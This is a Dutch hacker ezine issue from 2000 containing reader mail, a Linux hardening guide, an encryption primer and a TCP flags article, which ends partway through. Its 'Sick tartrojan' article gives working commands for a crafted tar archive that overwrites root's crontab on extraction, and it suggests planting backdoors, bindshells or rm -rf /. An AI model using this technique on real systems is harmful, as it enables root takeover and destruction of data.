Copy Link
Add to Bookmark
Report

Hackers 4 Hackers #7

Hackers 4 Hackers Issue 7, released on 23-03-2000

eZine's profile picture
Published in 
Hackers 4 Hackers
 · 8 months ago

		  ___ ___    _____    ___ ___ 
/ | \ / | | / | \
/ ~ \/ | |_/ ~ \
\ Y / ^ /\ Y /
\___|_ /\____ | \___|_ /
\/ |__| \/

+-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+
|h|a|c|k|e|r|s| |4| |h|a|c|k|e|r|s| |0|7|
+-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+
http://www.hackers4hackers.org
'23-03-2000', Momenteel 795 lezers.


Om je aan te melden bij de maillijst kan je een mailtje sturen
naar subscribe@hackers4hackers.org met als titel "subscribe h4h
emailadres"

Of je kan je online aanmelden op http://www.hackers4hackers.org

Artikelen en dergelijke kun je mailen naar post@hackers4hackers.org
Vragen kun je mailen naar de desbetreffende auteur of ook naar
post@hackers4hackers.org

Uitspraak:
[Viper: Hacken is geen LOI cursus of zo.]

Enkele interessante sites:
http://itris.eu.org
http://www.dutchthreat.org
http://www.security.nl
http://www.hit2000.org
http://hier.is/Triples
http://www.whatis.com
http://viper.dmrt.com

Leuke kanaaltjes op IRCnet:
#h4h
#hit2000
#coders.nl
#nlcoders


01. Disclaimer............................................... (Redactie)
02. Inleiding................................................ (Redactie)
03. Lezerspost............................................... (Redactie)
04. Linux Security guide voor: Linux newbie's................ (LordRaYden)
05. Inleiding tot encryptie (deel 1)......................... (Zym0t1c)
06. Sick tartrojan........................................... (drgenius)
07. TCP/IP Flags............................................. (Neon-Lenz)
08. Evenementen.............................................. (Redactie)
09. Zenith Kabelmodem........................................ (Hit2000)
10. Eindwoord................................................ (Redactie)

-------------------------------------------------------
01. Disclaimer
-------------------------------------------------------
We zijn niet verantwoordelijk voor datgene wat jullie met deze informatie
doen. Deze informatie dient alleen voor educatieve doeleinden. Als je in
problemen komt, kan je ons niks verwijten. Gebruik maken van deze
informatie kan strafbaar zijn. Meningen van auteurs hoeven niet hetzelfde
te zijn als die van de redactie.

Correspondentie met de redactie is mogelijk per email :
Algemeen - post@hackers4hackers.org
Asby (Hoofdredacteur) - asby@hackers4hackers.org
Berry (Website + Eind redactie) - berry@hackers4hackers.org
Tozz (Redactie) - tozz@hackers4hackers.org
Viper (Redactie) - viper@hackers4hackers.org
Nighthawk (Redactie + Lezerspost) - nighthawk@hackers4hackers.org

-------------------------------------------------------
02. Inleiding
-------------------------------------------------------
De nieuwe site is nu deels vernieuwd. We hebben het archief opnieuw
ingedeeld. En de delen uit elkaar getrokken in losse hoofdstukken.
De komplete h4h is nu enkel nog als een ZIP file te downloaden. Ook
is er een search engine aanwezig om snel een bepaald artikel te zoeken.

Er is ook een nieuw redactielid bij gekomen. Zijn nickname is NightHawk
(volgens gerrie een moeilijke naam) en hij zal actief meewerken aan
de redactionele artikelen. Dit is nodig omdat de poll op die op de
site gehouden is aangeeft dat de meeste lezers er prijs op stellen
dat h4h kleiner en vaker gaat verschijnen! Hieronder volgt de
uitslag van die poll:

H4H Moet kleiner en vaker:
Mee eens 72.9% - (54 Votes)
Mee oneens 27% - (20 Votes)
Totaal aantal stemmen: 74

De meeting van 4 maart was een groot succes en zeker voor herhaling
vatbaar. Er zijn 29 mannen + vrouwen (jaja) ondanks dat het carnaval
was gekomen. Een verslag van de meeting zal in het volgende nummer
komen te staan.

Op IRCnet in ons kanaal #h4h zit tegenwoordig ook een FILEBOT aan deze
bot kan je ook delen van h4h vragen.. (als hij aanwezig is... sorrie rippie)
Deze zal hij je vervolgens keurig DCC'en. Ook de redactie loopt steeds
vaker rond in dit kanaal... Dus ideeën en tips... Of voor een chat met de
redactie kan je daar terecht.

We zijn ook op zoek naar een sponsor voor de website. Deze zou bijvoorbeeld
een banner op de site kunnen plaatsen en evt een reclame tekstje in de delen.
We willen absoluut geen reclame site die vol staat met banners enz. worden
maar een beetje reclame inkomsten om de kosten van de redactie voor de site
te drukken en op de volgende meeting de lezers een biertje aan te bieden
zou wel zo gewenst zijn.

Tozz zal de komende maanden uitgeteld zijn. Er is een bus tegen zijn brommer
aangereden en nu moet hij daar eerst van bij komen (sorry tozz). We wensen
hem namens de redactie beterschap en hopen dat je snel uit het gips bent om
weer te gaan schrijven =)

We wensen iedereen veel leesplezier toe en mochten er op of aanmerkingen zijn,
surf dan even naar onze website en vul het in bij commentaar.


De redactie

-------------------------------------------------------
03. Lezerspost
-------------------------------------------------------
[Door Nighthawk]
--
Hoe krijg ik ****** een emailadres gekraakt?

[ Voor een email adres geld hetzelfde als bij de ip's. Het duid slechts aan
waar de mail naartoe moet. Ik neem aan dat je iemand zijn email account wilt
kraken. Zal waarschijnlijk ook weer een Hotmail adres zijn.. Ik raad je aan
op internet te zoeken naar "Hacktool" daarmee kan je nu ook hotmail account
kraken. En ik denk dat wij eerder reden hebben om die ****** te gebruiken
omdat figuren zoals jij dit soort dingen blijven vragen...... ]

Please say it to me...

[ I just did, by the way: why suddenly speaking in english? We are a dutch
ezine.. ]

FNCRABG6

[ N|ghtHawk ]

--
> Ontvang Hackers 4 Hackers zodra hij verschijnd door je toe te voegen aan
de mailing list

het is dan wel "verschijnt"
dat soort foutjes zitten er trouwens wel meer in de archive's
de info is verder wel o.k.

[ Berry: ja, iemant heefd mijn t en d doeds van mijn doedsenbort
omgetraait ]
[ Hawk: en aangezien berry geen idee heeftwaar hij ze terug moet plaatsen
(*zucht*) hebben we een serieus probleem ]

JvH

[ NHvH4H ]

--
H asby,

[ Zippie, alleen geen Asby het is N|ghtHawk dit keer die de twijfelachtige
eer heeft je te woord te staan.. ]

Ik heb een paar geintjes van een vriend gehad. Zou je mij even terug willen
mailen met nog een paar geintjes?

[ Geintjes? Nou vooruit, hier is er eentje omdat ik weinig tijd heb..
Wat is de overeenkomst van Geld en Schaamhaar?
--> Het groeit allebei niet op je rug ]

Alvast bedankt Zippie

[ Alvast graag gedaan, N|ghtHawk ]

--
Hallo

[ Hee ]

ik ben een begginer

[ je geeft het tenminste al toe, dat is al een begin ]

en wil meer te weten tekomen over IP-adresen

[ Wat wil je weten? Hoe ze eruit zien? Hoe ze voelen? ]

en hoe je die moet hacken

[Zoals we al eerder hebben moeten melden, kan je ip's niet hacken, dit is
slechts een "getal" waaraan je computer kan worden herkend...]

Ik wou het op de manier met betroking van ICQ

[ Mjah, heb ik ook wel eens, Hint: lees je eigen mailtjes ff na op vage
zinnen ]

als ik zo'n IP nummer heb wat moet ik dan moet ik dan een programa
downloaden of iets anders

[ Dat ligt eraan wat je ermee wilt gaan doen. Als je ze wilt sparen heb je
alleen een opschrijfboekje nodig. ]

Dankje Joppe

[ Graag gedaan, N|ghtHawk ]

--
Ik vind de Lay-out een beetje makkelijk, storten jullie je eens wat meer op
HTML.

[ Dat is niet de opzet van onze site.. En denk ook eens aan de lynx
gebruikers. De inhoud van onze site zijn de artikels, niet het uiterlijk..
Dagelijks wordt ons gemeld dat het mooier moet en iedereen het wel beter
ken. Als jullie betere artikels kunnen schrijven, dan mag je commentaar
geven.... ]

Ideen :
wwwhack password lists

[ *snik* ]

Hoeba de Koeba

[ N|ghtHawk ]

-------------------------------------------------------
04. Linux Security guide voor: Linux newbie's.
-------------------------------------------------------
Linux dichtspijkeren voor hackers. (newbie version)
Voor: Redhat Linux 6.0.

Deze gids is alleen geschikt voor LINUX STAND ALONE PC'S (wel met Dialup)
maar geen network stations of servers!

Als je linux voor de eerste keer installeert is het meestal zo hackbaar
als een Windows systeem In deze tutorial zal ik uitleggen hoe je Linux
redelijk goed kuntdichtspijkeren. Deze gids is niet voor Elite maar is
vooral gericht op de pro-newbie hacker. Een elite versie zal ook komen maar
aangezien ik d'r nog wel even zoet mee ben, moet je het toch maar even doen
met deze versie.

INSTALLATIE
Als je linux installeert installeer dan geen SERVER packages (anonymous FTP
Server etc.
Deze kunnen je systeem open zetten voor hackers en dat gevolg kan hebben dat ze
de /etc/passwd file "rippen" want niet echt leuk is.
En daarbij moet je je passwords ook shadowen, dit kun je doen door een vinkje te
zetten voor "use shadow passwords" in de redhat setup (Als je linux
installeert).

TCP/UDP Poorten sluiten.
Als we Linux geinstalleerd hebben, downloaden we Nmap (www.insecure.org/nmap) en
installeren deze als ROOT, vervolgens ga je terug naar je gewone account (bv
Lordrayden) en typt daar op de console:
nmap -sT localhost
Dit kleine tooltje (nmap) list alle open poorten op je systeem.
ik zij bij mij dat de poorten 25,21,79,98, open zijn.
Als je een beetje verstand hebt van TCP/IP weet je wat deze poorten betekenen.

We beginnen bij poort 25,
Meestal SMTP Protocool en als we telnetten kunnen we vrolijk mailen naar andere
adressen,niet echt iets ideaal dus,
Dus we loggen in als root, typen setup en enter en kiezen voor system services
en drukken op enter,
daar staan allemaal de services die je linux systeem telkens boot,
Ergens ertussen staat de service: sendmail, daar staat een vinkje voor haal het
vinkje weg en je poort 25 is closed

Alle overige poorten die er mochten staan zie INETD.CONF

INETD.CONF
Deze stappen moet je heel zorgvuldig doorlopen!.
Wat ik hieronder ga beschrijven beschadigt in de eerste instantie je Linux
systeem NIET.
Dit is een paardenmiddel om alle poorten in Linux te sluiten.
1. Je logt in als root.
2. start de X-Server
3. opent met een of ander tekstverwerkertje, /etc/inetd.conf (bv emacs
/etc/inetd.conf
4, In deze file staat een listing van alle poorten op je Linux systeem, voor een
bepaald aantal poorten een # staat,
5. Zet voor ELKE regel in /etc/inetd.conf een #.
6. Save de file
7. Reboot je systeem,
8. Controleer met Nmap wederom of de poorten in je systeem dicht zijn.


OVERIGE TIPS.
= Ga NOOIT als root het internet op!, als ze bij jou binnen komen heb je een
probleem!
= Accepteer nooit van een onbekende op het internet, of IRC een SCRIPT of
proggje. tenzij je hier verstand van hebt!, Deze scripts kunnen poorten
opzetten!
= Probeer af en toe het WHO command op de console, met dit commando kun je zien
wie er allemaal op je systeem is ingelogd,

I WANT MORE SECURITY!!
Dan zou ik aanraden om een firewall te instaleren (bv bastille linux) maar deze
zijn heel erg uitgebreid in de configuratie en zeker niet geschikt voor de
newbie.
In de eleete versie zal ik wel dit soort stappen behandelen.


Nmap
Nmap kun je ook gebruiken om andere hosts of clients mee te scannen,
experimenteer maar met het programma na een tijdje zul je zien dat het best wel
"vet" is.
Sommige commando's van NMAP vereisen root priveleges, deze kun je gewoon krijgen
met SU, (su root)


LordRaYden
lordrayden@x-stream.nl
UIN: 46682071
IRC: #hit2000 #csd

-------------------------------------------------------
05. Inleiding tot encryptie (deel 1)
-------------------------------------------------------
Legal shit & andere shit

Niks van dezen text mag gewijzigd worden zonder toelating van den auteur.
Verspreid em zoveel ge wilt, print em desnoods uit en hangt em in uw WC,
één ding vraag ik gewoon: laat dezen disclaimer staan, no mather what!
Stukken uit dezen text zijn wa geïnspireerd op da boek van William
Stallings, "Cryptography and Network Security - Principles and Practice -
Second Edition" en nog enkele andere docs die kunnen gevonden worden op
het net. De indeling (ook enkele voorbeelden) heb ik deels overgenomen
uit da boek. Losers die hierop commentaar hebben en denken 'Ja, zo kan ik
ook nen text ineen flansen!': wel, doeget dan zelf! Commentaar geven is
heel gemakkelijk als ge zelf niks wilt doen. Dienen boek is heel goe
geschreven, en ik doen toch de moeite om het in verstaanbare taal te
schrijven. Wat zit ik hier eigenlijk te doen? Ik moet mij hier helemaal
ni verontschuldigen...

Opmerkingen, bijvulsels, verbeteringen of andere zinvolle suggesties mogen
altijd doorgemaild worden naar zym0t1c@hotmail.com, andere shit naar
dev/null.
Spread (crack) the word people!


Ter nader info

Als alles goe gaat, dan zal ik een stuk of vijf delen schrijven over
encryptie. Wie weet worden er da meer, wie weet minder...
In 't eerste deel (dees dus) probeer ik -in simpele woorden- uit te leggen
wa encryptie eigenlijk is plus de mogelijke 'attacks' hierop. De voor- en
nadelen van encryptie worden ook tegen elkaar afgewogen voor hen die er
geen benul van hebben waartoe encryptie kan leiden...
Het tweede deel beschrijft de 'klassieke' encryptietechnieken -zowel de
substitutie (Caesar Ciphers, Monoalphabetic Ciphers, Playfair Ciphers,
Hill Ciphers en Polyalphabetic Ciphers), de transpositie (Transposition
Ciphers) als rotor machines...
Hopelijk hebde genoeg kaas gegeten van wiskunde... ;)
Vanaf 't derde deel pushen we het niveau fameus op. Hier beschrijf ik
vooral de 'moderne' -en meest gebruikte- encryptietechniek DES. Feistel
Ciphers komen trouwens ook aan bod.
In 't vierde deel sluit ik de 'conventionele' encryptietechnieken af.
Hier komen (waarschijnlijk) triple DES, IDEA, Blowfish, RC5, CAST-128 en
RC2 aan bod.
Het vijfde (en misschien laatste) deel geeft een inleiding tot 'publieke
sleutel' encryptietechieken zoals RSA, Diffie-Hellman en Elliptic Curves.

Ik weet ni wanneer een deel gaat afgewerkt zijn en dus moet ge daarover
ook geen mails sturen (ik heb ook nog andere zaken te doen).
Ik kan ook ten allen tijde mijn indeling veranderen, daar moet ge dan
gewoon maar mee leren leven!
Allez kom, on with the show...


Encryptie: wa is da?

Encryptie is nen techniek die toegepast wordt om betrouwbare informatie
uit te wisselen tussen één, twee of meer (betrouwbare) personen. Ja, ge
moet er dus helemaal ni vanuit gaan da elke persoon die gij vertrouwt wel
degelijk betrouwbaar is, anders kunde nog lelijk verschieten...
Be paranoid man!
Encryptie wordt vooral toegepast om bedrijfsspionage tegen te gaan, of om
bezwarende info uit te wisselen, of om hackers te kloten (crackers?), ...
Alles wa ge doet om iets onbruikbaar te maken, voor mensen die er
natuurlijk niks van mogen weten, kunde beschouwen als één of andere vorm
van encryptie. Hierdoor bestaat encryptie dan ook in geuren en kleuren.
Da laatste klopt ni echt... Eigenlijk hebde maar drie soorten: ten eerste
hebde de steganografie, ten tweede de conventionele encryptie en ten derde
hebde nog de encryptie via publieke sleutels.

Encryptie is -officieel gezegd- het proces waarbij ne plaintext via
bewerkingen aan de hand van ne sleutel omgezet wordt tot ne ciphertext.
Decryptie is het proces waarbij ne ciphertext via bewerkingen aan de hand
van diene zelfde sleutel te gebruiken, omgezet wordt tot de plaintext.
Enkel zij die diene sleutel (en eventueel het paswoord) hebben, zouden de
ciphertext moeten kunnen decoderen.

Stelde de ciphertext gelijk aan Y, de plaintext gelijk aan X, het
encryptieproces gelijk aan E, het decryptieproces gelijk aan D en de
sleutel gelijk aan k, dan komde gemakkelijk tot de volgende twee simpele
wiskundige formules: Y = Ek(X) en X = Dk(Y).
By the way, ne plaintext is gewoon den originelen text, en ne ciphertext
is de versleutelden text (gecodeerd dus).

Bij encryptie gaat iedereen ervan uit dat de encryptiemethode sowieso
gekend is. Alle encryptietechnieken kunde gemakkelijk vinden op 't net.
Zolang da er info wordt achtergehouden via beveiliging hierop, zijn er
mensen die da proberen (en kunnen) kraken. Brute force cracking is zonen
techniek die veel wordt gebruikt. Hierbij probeerde gewoon alle mogelijke
sleutels uit totda ge de plaintext vindt. Dezen techniek wordt trouwens
het meest gebruikt bij cracking contests en dergelijke. Ge kunt da ook
vergelijken met brute force hacking (uitproberen van alle mogelijke
paswoorden op een account via dictionaries). Om brute force cracking
praktisch onmogelijk te maken (lees: enorm tijdrovend) moet diene sleutel
onmogelijk te vinden zijn! De kracht van de encryptie hangt eigenlijk
volledig af van de grootte van diene sleutel.
Efkes een klein overzicht van den tijd die ge nodig zou hebben om ne
sleutel van een bepaald aantal bits brute force te kraken:

+----------------+------------------+-----------------+------------------+
| Sleutelgrootte | Aantal mogelijke | Nodige tijd aan | Nodige tijd aan |
| (bits) | sleutels | 1 encryptie/µs | 1E6 encryptie/µs |
+----------------+------------------+-----------------+------------------+
| 32 | 2^32=4,3E9 | 35,8 minuten | 2,15 millisec |
| 56 | 2^56=7,2E16 | 1142 jaren | 10,01 uren |
| 128 | 2^128=4E26 | 5,4E24 jaren | 5,4E18 jaren |
| 26 letter | 26!=4E26 | 6,4E12 jaren | 6,4E6 jaren |
| (permutatie) | | | |
+----------------+------------------+-----------------+------------------+

Ge moet weten da de sleutel ergens helemaal in 't begin kan liggen of
helemaal aan 't einde. Ge kunt stellen da ge gemiddeld den helft van alle
sleutels moet uitproberen om succes te oogsten.

Cryptanalyse is gewoon het hele proces van het (proberen te) kraken van ne
ciphertext.


Steganografie

Steganografie kunde eigenlijk ni echt beschouwen als encryptie. Ge doet
geen *echte* bewerkingen op ne plaintext via sleutels zoals da ge wel doet
bij de andere twee vormen. Hierdoor krijgde ook genen cyphertext.
Steganografie is simpelweg het onzichtbaar maken van ne plaintext. Er
bestaan denk ik duizend en één technieken waarmee ge da kunt bekomen
(onzichtbaren inkt, schrijven met citroensap op papier, elken eerste
letter nemen van elk woord in nen tekst, ...) maar 'k ga der hier ni
dieper op in gaan, behalve ene (modernen) techniek die ik echt machtig
vind en da vandaag den dag ook wordt toegepast. Ik veronderstel da ge al
ne keer gehoord hebt van Kodak Photo CD's. De maximum resolutie daarvan
is 2048 op 3072 pixels (tot nu toe althans). Elke pixel bevat 24 bits aan
RGB info. Stel nu da ge de waarde van de minst betekenenden bit (snapte
da vorig woord en is da juist?) van elke pixel vervangt door een andere
waarde. (Geen nood: ge merkt daar ni veel van op den originele foto.)
Awel, zo kunde dus ne plaintext van 2,3 mega's verbergen in elken digitale
Kodak foto! Cool he?


Conventionele encryptie

Alle conventionele technieken die in 't tweede, 't derde en 't vierde deel
besproken worden, werken allemaal rond 't zelfde principe, aan de hand van
ne sleutel. Alle zaken die hierboven beschreven staan (zie 'Ter nader
info') komen allemaal vrij uitgebreid aan bod. Na de klassieke komen de
moderne technieken aan bod. DES (Data Encryption Standard) is hiervan de
meest bekende en is wereldwijd de meest gebruikten techniek. UNIX en
Linux baseren hun paswoordverificatie hier trouwens op.


Publieke sleutel encryptie

Het grootste verschil tussen publieke sleutel encryptie en conventionele
encryptie is het gebruik van meerdere sleutels. Bij conventionele
encryptie wordt er enkel ene sleutel gebruikt in tegenstelling tot de
publieke sleutel encryptie waarbij twee sleutels worden gebruikt (ne
geheime sleutel en ne publieke sleutel). Via de publieke sleutel van nen
andere te gebruiken op ne plaintext kan (hopelijk) enkel en alleen diene
gast van wie diene publieke sleutel is, diene ciphertext decoderen.
Hier gaan we ervan uit da de publieke sleutel ook gekend is, dus moet de
private sleutel zo geheim mogelijk gehouden worden.


Attacks

Zoals ge al gelezen hebt, is cryptanalyse het (proberen te) kraken van ne
ciphertext. Brute force cracking was al kort besproken. Er bestaan -in
grote lijnen- vijf mogelijke attacks: Cyphertext only, Known plaintext,
Chosen plaintext, Chosen Ciphertext en Chosen text. Afhankelijk van wa de
analyst al weet van de cyphertext zal em kiezen welken te gebruiken...
Vrij logisch toch maar den analyst heeft altijd de ciphertext in zijn
bezit. Gewoon ff om te vermelden. =)
Cyphertext only zal praktisch ni worden gebruikt. In dees geval heeft den
analyst de minsten info (gebruikten techniek en de ciphertext). Dees is
de meest gunstige voor iedereen behalve den analyst, maar zal weinig
voorkomen.
Known plaintext zal gebruikt worden als den analyst ideeën heeft van
mogelijke stukken plaintext. Ge kunt bijvoorbeeld redelijk veel info
verkrijgen door ne file te editeren en zijn structuur te bekijken. EPS-
files, ZIP-files, Word-files, ... beginnen altijd met dezelfden info.
Via dezen info kunde u een beter beeld vormen van de sleutel en kunnen de
grenzen waartussen de sleutel ligt gemakkelijk beperkt worden. (Bij wijze
van spreken althans! =)) Algemeen bekend is da nen bepaalden techniek
sowieso bestand is tegen ne Known plaintext attack.
Chosen plaintext kan simpel worden uitgelegd: heeft den analyst de
mogelijkheid om te kiezen welken plaintext moet versleuteld worden en deze
ook te versleutelen, awel, dan kan hij hierdoor een beeld krijgen van de
structuur van de geheime sleutel.
Chosen ciphertext en Chosen text worden veel minder gebruikt, dus leg ik
die ook ni verder uit. Ge vindt er trouwens ni veel info over op het net.
De bovenste drie zijn eigenlijk de meest gebruikte.


Voor- en nadelen van encryptie + enkele opmerkingen

Mensen die te weten komen da ge iet encodeert kunnen beginnen denken da ge
iet te verstoppen hebt voor hun en/of anderen. Toegegevens of niet: als
ge iet voor ogen krijgt da onleesbaar, verstopt of geëncodeerd is, dan
krijgde meestal de idee om te willen weten wa ge zogezegd ni zou mogen
weten. Gezonde nieuwsgierigheid noemen ze da, denk ik. Geef nu toe: als
ge iet ni moogt weten, of als iet ni bedoelt is voor uw ogen, dan wilde
toch gewoon weten wa da zou kunnen zijn. Die nieuwsgierigheid, die need-
to-know, da knaagt toch. Ge kunt natuurlijk altijd als ne goeien burger
door 't leven gaan en er u voor de rest niks van aantrekken, maar waar is
dan in godsnaam het plezier nog te vinden? ;) Wel dus, pas op met de
zaken die ge encodeert. Soms doede er goe aan, soms ook helemaal ni.
Stelt u voor dat uwen baas erachter komt da ge vanalles zit te encoderen
wat hij ni mag weten, ge zou wel ne keer rap kunnen vliegen...

Ook moet ge altijd zien da ge zowel uwe geheime sleutel als het gebruikte
paswoord ni vergeet. Nu moogde uw eigen zo goe beschermen tegen hackers,
crackers of wat dan ook: zie gewoon da ge uzelf ni buitensluit. Houdt
altijd een kopie van uwe sleutel bij en een kopie van uw paswoord. Ergens
op een veilige plek waar ge zeker van zijt da niemand eraan kan. Zet da
ni op diskette met ne label 'PGP key' of iet dergelijks; ge kunt dan
evengoed uw gegevens ni encoderen. Wa ik bijvoorbeeld zou doen is ergens
in een bank ofzo een geheime kluis huren en daar een diskette in opbergen
met een kopie van diene sleutel. Ik stel ook voor da ge die diskette
compresseert met laat ons zeggen WinZip omda ge daarbij tijdens de
compressie ook een paswoord kunt meegeven. Stel nu nog da ze die diskette
te pakken krijgen, dan moeten ze eerst en vooral da paswoord van Winzip
proberen te vinden vooralleer ze uwe sleutel kunnen gebruiken. Maakt het
hun dus zo moeilijk mogelijk!

Voor de mensen met een paardenverstand: ge kunt ook altijd uwe geheime
sleutel editeren met nen hexeditor ofzo en alle tekens van buiten leren.
Dan kunde uw diskette weg smijten en als ge ooit uwe sleutel zou
kwijtgeraken, dan maakte ne nieuwe ASCII-file aan en typt ge al die tekens
in de juiste volgorde in. Is't da ge geen fout hebt gemaakt, awel dan
hebde een kopie van uwe sleutel. Deze methode raadt ik echter af, tja,
waarom zou da zijn?

Maar hoe maakt ge nu een kopie van ne geheime sleutel zonder da iemand
er gemakkelijk aankan? Ge kunt natuurlijk iet heel simpel doen...
Stel, da ge kunt programmeren. Neemt nu bijvoorbeeld de taal C. (Da kan
normaal gezien geen enkel probleem zijn omda hier in H4H ne redelijk goeie
C-tutorial wordt gepubliceerd. ;)) C-taal is trouwens simpel.
Wa ge bijvoorbeeld kunt doen is een klein proggie maken waarin da ge de
file van uwe geheime sleutel opent, elk karakter verandert door een ander
en vervolgens diene file terug saved. Dan geefde diene file bijvoorbeeld
nen andere naam en saved diene ergens waar mensen ni veel argwaan over
zullen hebben. Nu, als ge uwe geheime sleutel dan ooit nodig hebt, dan
gebruikte gewoon een variant van da klein proggie die elke veranderde
letter terug verandert in den oorspronkelijke. Een simpel iets da ge kunt
doen is bij elk karakter bijvoorbeeld 32 bij te tellen. Uw ander proggie
moet dan gewoon van elk karakter 32 aftrekken en ge hebt terug uwen
originele sleutel. Het spreekt vanzelf da ge da proggie ne naam geeft da
ni aanzet tot het verdenken van iet. Ik denk juist nog aan iets: in alle
C-tutorials wordt als eerste proggie het bekende "Hello world" gemaakt.
Nu, ge laat da proggie tijdens da het uwe sleutel aan't veranderen is,
"Hello world" op't scherm printen en niemand zal iet verdenken. Ze zullen
hooguit denken da ge leert programmeren. Goed he? =)

Ge moet ook oppassen met wa ge encodeert. Ni alles is bezwarend en ni
alles wa misschien belangrijk is moet perse geëncodeerd worden. Is't da
iemand die gegevens onderschept, dan kan diene vanalles beginnen verdenken
omda ge da toch encodeert.
Ik bedoel gewoon: van de moment da ge iet encodeert, zijt zeker wa ge
ermee doet.
In Frankrijk was het encoderen van gegevens tot voor kort trouwens bij wet
verboden.

Ik heb het al veel gezegd en herhaald, en da mag misschien op gezaag
lijken, maar pas op met het paranoid zijn. Ge kunt simpele text-bestanden
beginnen encoderen die helemaal ni belangrijk en/of bezwarende info met
zich meebrengen, maar als bijvoorbeeld de flikken er ooit achter komen da
ge vanalles zit te encoderen, hoe onschuldig ge ook moogt zijn, ze kunnen
u daardoor beginnen verdenken omda ge gegevens achterhoudt. Niemand houdt
daar trouwens van, en zeker en vast de flikken ni. Als de flikken iemand
kunnen kloten, geen nood: dan doen ze da ook!
Nog zo'n stomme anekdote: vroeger (enkele jaren geleden) was da hier bij
ons precies de gewoonte van de flikken om mij op straat tegen te houden en
te beginnen kakken over het feit of ik al dan niet shit of zoiet op zak
zou hebben. En hoeveel keer ge ook zei da ge niks op zak had, het enige
wa ge daarmee bekomt is da ze gewoon ambetanter worden in de hoop da ze u
ook maar voor iet kunnen oppakken. Die klootzakken van... Whoops, da
heeft hier helemaal niks meer mee te maken, maar bon, iedereen weet da:
den helft van den tijd zijn flikken gewoon rasechte klootzakken.


Ter achter info =)

Voilà, da was dus mijn eerste deel. Dus, zoals reeds vermeld vanboven,
als ge iet interessants te zeggen hebt, bijvulsels, opmerkingen,
verbeteringen, andere mogelijke vormen van het geheim houden van sleutels
of wat dan ook, awel, dan moogde die altijd doormailen naar:
zym0t1c@hotmail.com

Geen enkel idee wanneer het volgende deel uitkomt, het enige da ik met
zekerheid kan zeggen is da het zeker en vast binnen de komende maanden zal
zijn (waarschijnlijk zal H4H ook het volgende deel publiceren).

-------------------------------------------------------
06. Sick tartrojan
-------------------------------------------------------
Even een kleine beschrijving hoe je tar kunt gebruiken voor iets leuks (te
lui om een 500k tekstbestand te schrijven)
TAR staat voor Tape ARchive, het lijkt misschien een programma dat
weinig schade toe kan brengen, maar het heeft een leuke feauture.

Het mooiste van TARfiles is dat je symlinks kan toevoegen aan een Archive.
Een TARfile kan elk bestand overschrijven op je systeem als je TAR
uitpakt als root (!!).
Je maakt een symlink in een directory (bijv. /test) die naar het bestand
dat je wilt overschrijven wijst (bijv. /var/spool/cron/crontabs/root
Als een test zou dit dus zijn:
# ln -s /var/spool/cron/crontabs/root /test/root
en vervolgens:
# tar -cvf test.tar *

Nu heb je de symlink naar /var/spool/cron/crontabs/root in je tarfile.
Nadat je dat gedaan hebt, maak je een 'root' file (jouw crontab) en voegt
het aan de TARfile toe met:
# tar -rf test.tar root

De 'root' file schrijft over de symlink heen als de file wordt ge-untarred,
want het komt na het uitpakken van de symlink (en schrijft dus zo over het
bestand waar de symlink naar wijst)
Nu heb je een TARfile die crontab root overschrijft als ie uitgepakt wordt,
dus je kan cron elk commando geven op het systeem, of je kan backdoors starten
(kernel modules) en zelfs na het uitvoeren kan je de cron, symlink en
rootfile zichzelf laten verwijderen.

Wat ik deed (om het verhaal kort te houden) met voorbeeld m00 (bestand)
is het volgende:

(natuurlijk werkt het alleen als root het TAR commando gebruikt)

# mkdir test
# mkdir test2
# cd /test2
# echo test > /test/m00
# ln -s /test/m00 /test2/m00
# pwd
/test2
# tar -cvf test.tar *
# ls
m00@ test.tar
# rm m00
# ls
test.tar
# echo het werkt > m00
# tar -rf test.tar m00
# ls
m00 test.tar
# rm m00
# ls
test.tar
# cat /test/m00
test
# tar -xvf test.tar
m00
m00
# cat /test/m00
het werkt
#

:-)

/* EVIL MODE */

Natuurlijk kan je zo'n tar nu vol stoppen met zieke grappen zoals rm -rf /
of insmod'en van kernel modules, zodat je een mooie backdoor krijgt.
Paswoorden aanpassen.. , bindshells activeren enzovoorts. Tevens kun je
een tweede link & file meetarren om die als script te laten starten door
cron. Link hem bijvoorbeeld naar /tmp/.blaat dan weet je de exacte locatie
om in de cron te zetten, daar je nooit weet waar root de tarfile uitpakt.
Of je laat de tar gewoon /etc/passwd en /etc/shadow overschrijven.

/*END OF EVIL MODE */


De meeste OS'en gebruiken verschillende crontab-locaties. Hier een lijstje
van enkele OS'en:

Slackware: /var/spool/cron/crontabs/root
Redhat: /var/spool/cron/root
SuSe: /var/spool/cron/tab/root
SunOS: /var/spool/cron/crontabs/root
Debian: /var/spool/cron/crontabs/root
FreeBSD: /var/spool/cron/tabs/root


Wijze les: Pak geen files als root uit


drgenius
========
Grtz to #phreak.nl and h4h
theinsanedrg@geocities.com

-------------------------------------------------------
07. TCP/IP Flags
-------------------------------------------------------
Ik heb dit stukkie geschreven om jullie te introduceren in de flags van
TCP-headers. Ik hoop dat jullie hier wat van leren, en zo niet... pech
gehad dan. ;-) Laten we maar beginnen:

De TCP-header bevat 6 velden met 1 bit flags.
De 6 velden in een TCP-header zijn:

URG = Deze flag laat de ontvangende TCP-module weten dat het veld voor
"Urgent Pointer" wijst op urgente data. (De TCP-Module moet eerst de
urgente data verwerken voor de rest van alle data).

ACK = Deze flag laat weten dat het veld ACK-Nummer een geldige ACK-Nummer
heeft. Dit zorgt ervoor dat de TCP de data vertrouwd.

PSH = Deze flag heet PUSH. Als deze aan staat, dan moet de TCP-module de
data direct van dit deel naar het doel sturen. Normaal zou de
TCP-module de inkomende data in een buffer houden en ze sturen tot
de buffer van het doel vol is. De PSH-flag laat de TCP-module weten
dat de data van dit deeltje niet eerst naar de buffer hoeft.
Bijvoorbeeld Telnet-applicaties gebruiken deze flag. Daardoor stuurt
TCP de toetsaanslagen van de user direct naar de Telnet-server.
Hierdoor ziet de gebruiker zijn getypde letters direct op het scherm,
zodat het makkelijk werken is.

RST = Deze flag vraagt de ontvangende TCP-module om de connectie te herstellen
(reset). TCP stuurt een msg met deze RST-flag als er problemen zijn
ontdekt met de connectie. De meeste applicaties stoppen als ze deze flag
ontvangen, maar het is mogelijk met behulp van de RST-flag's uitgebreide
algoritme's te schrijven die programma's kan laten herstellen na een
crash in hardware of software.

SYB = Deze flag geeft de ontvangende TCP-module instructies om bepaalde
nummers te synchronizeren. TCP gebruikt deze flag om de ontvangende
TCP-module te laten weten dat de sender nieuwe data wil sturen.

